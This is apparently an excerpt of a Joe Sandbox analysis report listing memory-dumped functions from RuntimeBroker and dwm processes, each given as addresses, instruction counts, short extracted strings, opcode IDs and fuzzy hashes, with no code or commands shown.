                                                                      Function 00007FFAAB450550 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7644702f4e744c410a50d4cc6acd0ad3124ce4924d145ffbab59a4d05bddeedc
                                                                      • Instruction ID: 49f6b5f8544a3a5314c4057f1563dae9fd7e123c7adfab8f20c9c3b2c77dfb0e
                                                                      • Opcode Fuzzy Hash: 7644702f4e744c410a50d4cc6acd0ad3124ce4924d145ffbab59a4d05bddeedc
                                                                      • Instruction Fuzzy Hash: 38C08055C3FD49D2D16457350D7301438C06B47144FC502D8D44CC15D9D48F084D53C6
                                                                      Function 00007FFAAB4506A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction ID: c41aedb6fb691dffc037f700b64dc7446e60b9af2d2bbb701d1606af1ea6093b
                                                                      • Opcode Fuzzy Hash: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction Fuzzy Hash: C0C08C08E0BC0BC3F800F72E14020ACAA006FC7290FD0833AC40C402E59C0E28DD01C6
                                                                      Function 00007FFAAB4512B8 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction ID: eb85e03d4dcf60242a7e97fc5875e8220b64efe062badbaf92a5322e214e82b2
                                                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction Fuzzy Hash: 9AC04C34551D498FC948EB29C88595477A0FB1A215BD50194E40DC7171D659DCD5C781
                                                                      Function 00007FFAAB453416 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 08feec5c434f068684729aaa5657252f90fa50ca7360bc371269387f42221714
                                                                      • Instruction ID: 5a62ace6557856dd984e0062dc1dc065bf66e85dcdb87b852679dced80c6b259
                                                                      • Opcode Fuzzy Hash: 08feec5c434f068684729aaa5657252f90fa50ca7360bc371269387f42221714
                                                                      • Instruction Fuzzy Hash: 23C04C46F19D6697F259A228C431A7F04569F8469CF9445B8E00EC67DACD0C5F0152C6
                                                                      Function 00007FFAAB453A81 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction ID: 8736f29bde42d3d4b834fd5650b63b90996efaf617e23afbcb9ed29d777e89d5
                                                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction Fuzzy Hash: 52C02B10C0D404C3E32AC33044001FD31401F5B304F05C376C00F52091CE281C081180
                                                                      Function 00007FFAAB4506C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction ID: e3fb3f7d20ad15394514bcac524ea82861740eef03e6e12564f572e6b514cc46
                                                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction Fuzzy Hash: 12B01204C57C0F83A804777E08420A478505F46140FC04274D40C40199984E18AC02C3

                                                                      Non-executed Functions

                                                                      Function 00007FFAAB4509B0 Relevance: 5.2, Strings: 4, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000026.00000002.2223394236.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_38_2_7ffaab450000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: 69e90d77f452adf29e7fc8c0cf89335f429999deb88ddb0da52c7696247e7b91
                                                                      • Instruction ID: 0f0e3c153b92b32ef7d5cbdf679a1fda690449e09e499981e4237834940c595d
                                                                      • Opcode Fuzzy Hash: 69e90d77f452adf29e7fc8c0cf89335f429999deb88ddb0da52c7696247e7b91
                                                                      • Instruction Fuzzy Hash: 2E51B34FB4956276E21133FCF4099ED5BE8EFD5276B094ABBD14EC91834C086C8583E5

                                                                      Executed Functions

                                                                      Function 00007FFAAB440D4C Relevance: 6.5, Strings: 5, Instructions: 265COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5[_H$b43$r63$r63
                                                                      • API String ID: 0-3569791616
                                                                      • Opcode ID: cea0293ab9988eb4f80581bee14c2f3473b6f3b0639a08c4ef9b3921700ec4b2
                                                                      • Instruction ID: 903a6407bba7e1d4954bbaf0c028044c04b5c2a114c3b746e45323009d841148
                                                                      • Opcode Fuzzy Hash: cea0293ab9988eb4f80581bee14c2f3473b6f3b0639a08c4ef9b3921700ec4b2
                                                                      • Instruction Fuzzy Hash: 8091F9B6A08A898FE749DB68C8657A97FE1FB96350F4444BBC04DC73E2CB781424C740
                                                                      Function 00007FFAAB471945 Relevance: 1.7, Strings: 1, Instructions: 460COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 6abf19f814f71fcabdd82a3ea9829dbfbe4266bd13e943dbbf11428034c66232
                                                                      • Instruction ID: f6fbe168ce19d33a46f464d40bcef0c247b3953ae2cd9eb48b156ba579f5901f
                                                                      • Opcode Fuzzy Hash: 6abf19f814f71fcabdd82a3ea9829dbfbe4266bd13e943dbbf11428034c66232
                                                                      • Instruction Fuzzy Hash: BEC1CD62A2D6964BE31D4B284C860B577D6EBD3241B18C27DD8DFC7097F928E84BC2C1
                                                                      Function 00007FFAAB472CB6 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: a07aaf050c2e93f97fccf936461b408d3c81567e1a6f0ddef4601b595b3f28f9
                                                                      • Instruction ID: fbb2286ad5fcfca1d69db3ac445aa2e548bf9e14742b24a918e39c80d778e424
                                                                      • Opcode Fuzzy Hash: a07aaf050c2e93f97fccf936461b408d3c81567e1a6f0ddef4601b595b3f28f9
                                                                      • Instruction Fuzzy Hash: 1E41A732A08919CFDB58E758C495BB877A2FB9A350F0582B9D00DD72D6CE346C89C7C1
                                                                      Function 00007FFAAB475494 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 63
                                                                      • API String ID: 0-3819469774
                                                                      • Opcode ID: 895d6f01b06057cad1b2fd9b537a5b2c6c8060dfe139118ff0d83fa651ad5630
                                                                      • Instruction ID: 53fff9d696a3ccc5c0167571fb9305296d068850483e249d718b22f62ff702f2
                                                                      • Opcode Fuzzy Hash: 895d6f01b06057cad1b2fd9b537a5b2c6c8060dfe139118ff0d83fa651ad5630
                                                                      • Instruction Fuzzy Hash: 52214F71A199598FE798EB28C8566F8B3A1FFA9340F5085F5D04DC3192CD346DC58B80
                                                                      Function 00007FFAAB47DF06 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8e=
                                                                      • API String ID: 0-1240725123
                                                                      • Opcode ID: 7325bc257dd90cb28d9d2f0140cb7293e82906273ace0fb0d96613e92bb14dcf
                                                                      • Instruction ID: 359466f498cc4d118050f5dd5a3c586a2365977e1abe7764f621a0fe01bc9cb7
                                                                      • Opcode Fuzzy Hash: 7325bc257dd90cb28d9d2f0140cb7293e82906273ace0fb0d96613e92bb14dcf
                                                                      • Instruction Fuzzy Hash: CF01BC72F1881A8BEB94EA28D4457BD73E1EFD4351F008576D00ED7180DE28A9D8CBC0
                                                                      Function 00007FFAAB4737C9 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 2aea2419dd350be5aca04bd3521452519eaf3f094047496acd3fb0bad66fac91
                                                                      • Instruction ID: 0fb0b3267fff6d9b5198283deacce8a94e31259c5d1254573310772f3fed70aa
                                                                      • Opcode Fuzzy Hash: 2aea2419dd350be5aca04bd3521452519eaf3f094047496acd3fb0bad66fac91
                                                                      • Instruction Fuzzy Hash: A7F0E56050E7C04FD71A9A3888684517FA0EF2720134A41EFC045CF1E3DA1D9C89C701
                                                                      Function 00007FFAAB47AC59 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 0dc75ec3b0b0f1b5973b2774d8e390f9b5fc0b57f939975d977d88cb41dda071
                                                                      • Instruction ID: 6642da5c5362c2b8720c4522fa14d1824a09e59127200401373c1df10afea694
                                                                      • Opcode Fuzzy Hash: 0dc75ec3b0b0f1b5973b2774d8e390f9b5fc0b57f939975d977d88cb41dda071
                                                                      • Instruction Fuzzy Hash: 0FE0657150E7C48FD71A963888698557FA4EF6720174941EEC045CF1A3EA1D9885C741
                                                                      Function 00007FFAAB453F39 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: e3ac12539d2b10eb55f3fd6f5f8b859a1a48a997495f5925e8f0f48f4453c59c
                                                                      • Instruction ID: 181d6959e6145b37e27071c09ecdbee5094a168f0a5ae79c1411c31d57bb9ec4
                                                                      • Opcode Fuzzy Hash: e3ac12539d2b10eb55f3fd6f5f8b859a1a48a997495f5925e8f0f48f4453c59c
                                                                      • Instruction Fuzzy Hash: 2EF0656194E7C04FC71AD73488698557F61EF6720174A42EEC04ACF1A3DA1DCC45C751
                                                                      Function 00007FFAAB473BE9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: dd2e0a46f886103252cddd811256fbe450b12ad6ba3a5085da78d7cdb3a475e8
                                                                      • Instruction ID: 30fe285fb3144f7462b419ba4fe831f3d762adafbe91459b173b022142b815ac
                                                                      • Opcode Fuzzy Hash: dd2e0a46f886103252cddd811256fbe450b12ad6ba3a5085da78d7cdb3a475e8
                                                                      • Instruction Fuzzy Hash: AEF0E57050E7C04FD70AD7348869414BFA0EF2720134941EEC045CF1A3DA1CD885C711
                                                                      Function 00007FFAAB472539 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: c5757a95ec6beab1320a8cb2cc1ad5f59b41cd23fa1a2e89d62d099f3aaee16b
                                                                      • Instruction ID: 77caddb6fa254af773627cb71959afec764102713b10ca85366777bc4bd10943
                                                                      • Opcode Fuzzy Hash: c5757a95ec6beab1320a8cb2cc1ad5f59b41cd23fa1a2e89d62d099f3aaee16b
                                                                      • Instruction Fuzzy Hash: 31F0657194A7C08FCB19DA3888A9855BF60EF6720174A42EEC045CF1A7DA2DD88ACB41
                                                                      Function 00007FFAAB47AD29 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 906a854626dc74c83dd7189e40aec860d618a4003808e0508426c040b632cd41
                                                                      • Instruction ID: c4a66ddf08b53fa0a81383682ee6730c9b94841a9b68fe8d8b89c9ab04022be3
                                                                      • Opcode Fuzzy Hash: 906a854626dc74c83dd7189e40aec860d618a4003808e0508426c040b632cd41
                                                                      • Instruction Fuzzy Hash: 38F0657190E7C48FCB1ADB7488698557FA0EF6720174A55EFC045CF1A7EA2D8889CB41
                                                                      Function 00007FFAAB47B229 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 2b698a6ebc5b36a0d445107bf54530d868cbf990d09814e7e97f06061df9b199
                                                                      • Instruction ID: a008cd5dd3ea68c49a7a6f871d611836c25210d640683a261409664c36777008
                                                                      • Opcode Fuzzy Hash: 2b698a6ebc5b36a0d445107bf54530d868cbf990d09814e7e97f06061df9b199
                                                                      • Instruction Fuzzy Hash: 49E0926144E3C04FCB06AB348875C453FA0DE2721178A40DEC045CB0B3D21E9849C702
                                                                      Function 00007FFAAB4725C9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 64eb5e5e4d750f7659160ff548d98ffe11805b61fd02f7141648fd94b7cb76c6
                                                                      • Instruction ID: 0f74f1312c94d4367b3f86b64d29c7bed787e989357995fffc0e05907a7b0718
                                                                      • Opcode Fuzzy Hash: 64eb5e5e4d750f7659160ff548d98ffe11805b61fd02f7141648fd94b7cb76c6
                                                                      • Instruction Fuzzy Hash: 2CE01A6144F7C08FCB4AEB7488698447FA0AE6721078A41EEC049CF1B7EA2E8889C701
                                                                      Function 00007FFAAB4789A9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: e59e868506ee6fbd5b508b096e1e25ddf965de27926d9a3e97c95849bdfe97c5
                                                                      • Instruction ID: b6de03b5f97559c7f25ea08c8357f04626411faf07c42436bac23bd72c18a450
                                                                      • Opcode Fuzzy Hash: e59e868506ee6fbd5b508b096e1e25ddf965de27926d9a3e97c95849bdfe97c5
                                                                      • Instruction Fuzzy Hash: 65E01A7144F7C04FCB4AEB7488698447FB0AE6721078A40EEC049CF1B3E62E8849CB01
                                                                      Function 00007FFAAB4408D0 Relevance: .2, Instructions: 172COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 28ced960330003d6c799f90372f58b3b350fecb332fd901037cfe82edf92df4c
                                                                      • Instruction ID: 998911367f09f49b53b758e15389222f43d458d5cc4ba2ade463c100577cf6f7
                                                                      • Opcode Fuzzy Hash: 28ced960330003d6c799f90372f58b3b350fecb332fd901037cfe82edf92df4c
                                                                      • Instruction Fuzzy Hash: CB412C3264C9159FD714FB6CE4889F87BE0EF8632170544BBD08ACB163DA10AC8183C1
                                                                      Function 00007FFAAB44090D Relevance: .2, Instructions: 150COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: afbac1c0f7fe40480c74552757cce512042b40293a4db4df242dc6a63c6c3777
                                                                      • Instruction ID: 814835d03e24c89104dcbaf5981c0bade38d86014bcc76b6edf75f967e506206
                                                                      • Opcode Fuzzy Hash: afbac1c0f7fe40480c74552757cce512042b40293a4db4df242dc6a63c6c3777
                                                                      • Instruction Fuzzy Hash: 96411552A4E6966FE714B3BCE05A9F87BD0EF86361B1548FAD04EC71A3CD08688182C5
                                                                      Function 00007FFAAB440908 Relevance: .1, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b8d78221505acd2fce8fbe0879699db9f6b864f5d2b3e821c2c93b793d34758d
                                                                      • Instruction ID: 713c8b5414808e1ca5e637a988efc28f32dc33321c35014708da64902c1609a9
                                                                      • Opcode Fuzzy Hash: b8d78221505acd2fce8fbe0879699db9f6b864f5d2b3e821c2c93b793d34758d
                                                                      • Instruction Fuzzy Hash: 4721D53130D8184FE768EB0CE889DB973D1FB5A32170101BAE58EC7136E911EC9287C1
                                                                      Function 00007FFAAB440960 Relevance: .1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: eefc8e17a47c8e0ae02eb29e999d5d3bbc23dba5e9c733db15716ea1b3ea3852
                                                                      • Instruction ID: 745fc67e5482ca8371b208111d17250ca250b2908adbcd4f2ebd1cc21f997d14
                                                                      • Opcode Fuzzy Hash: eefc8e17a47c8e0ae02eb29e999d5d3bbc23dba5e9c733db15716ea1b3ea3852
                                                                      • Instruction Fuzzy Hash: FD313852A4EA962BF358B37CE45A5F977D1EF85361B1444FAD40FC32E3CC086C814285
                                                                      Function 00007FFAAB44116D Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4117ce5e809ebc0789df048419fb850b00d744837584a42956d5a8f8d68829c9
                                                                      • Instruction ID: e8efa50b795121c61155579fb5a97fcc087cc0d3f2137c4f452a5fedec43e71d
                                                                      • Opcode Fuzzy Hash: 4117ce5e809ebc0789df048419fb850b00d744837584a42956d5a8f8d68829c9
                                                                      • Instruction Fuzzy Hash: 1B31E63190DA4A8FDB45EB68C8559F97FF0FF5A310B0445BAC00EC71A2DA28A455C781
                                                                      Function 00007FFAAB440998 Relevance: .1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a02e609e97f7f16a9934e0bd088f5db1b35210a156e092126bda41bf9acd1536
                                                                      • Instruction ID: ae8c2356c7b183175a0fcbeca13073740ea6e1cce389fd000c2cea90c5284c91
                                                                      • Opcode Fuzzy Hash: a02e609e97f7f16a9934e0bd088f5db1b35210a156e092126bda41bf9acd1536
                                                                      • Instruction Fuzzy Hash: F3313C20B0EA955FE758B738C4696B97BD1EF59350B1444FDD40EC32E3CD14AC458381
                                                                      Function 00007FFAAB440C25 Relevance: .1, Instructions: 93COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 653d432e21e3e7e1044213ec48089f495bdea415fb6a58acac5dc6c1ca649f82
                                                                      • Instruction ID: 2baa2c149b02511760cac5a5377d010e626a56e1c4a945517c1b375cce741792
                                                                      • Opcode Fuzzy Hash: 653d432e21e3e7e1044213ec48089f495bdea415fb6a58acac5dc6c1ca649f82
                                                                      • Instruction Fuzzy Hash: 4A312476A0D64ADFE301AB78D4052EC7FB0EF82351F0485B6D04DCA2D3D93829A987C1
                                                                      Function 00007FFAAB472601 Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3084a81244494e939fc79d4bc553f60fe59bc38a5706014da05d8faf2eb09dee
                                                                      • Instruction ID: 8d825afd3a0bbe46512e692c739a6df47558d29a69ebe3c275ecf9fe6bfccf53
                                                                      • Opcode Fuzzy Hash: 3084a81244494e939fc79d4bc553f60fe59bc38a5706014da05d8faf2eb09dee
                                                                      • Instruction Fuzzy Hash: 4621C851A1DA868FE684E37D88A56B57A91FF5B340F0441BAE00CC35E3CC5868898392
                                                                      Function 00007FFAAB4469E3 Relevance: .1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000027.00000002.2305390461.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_39_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
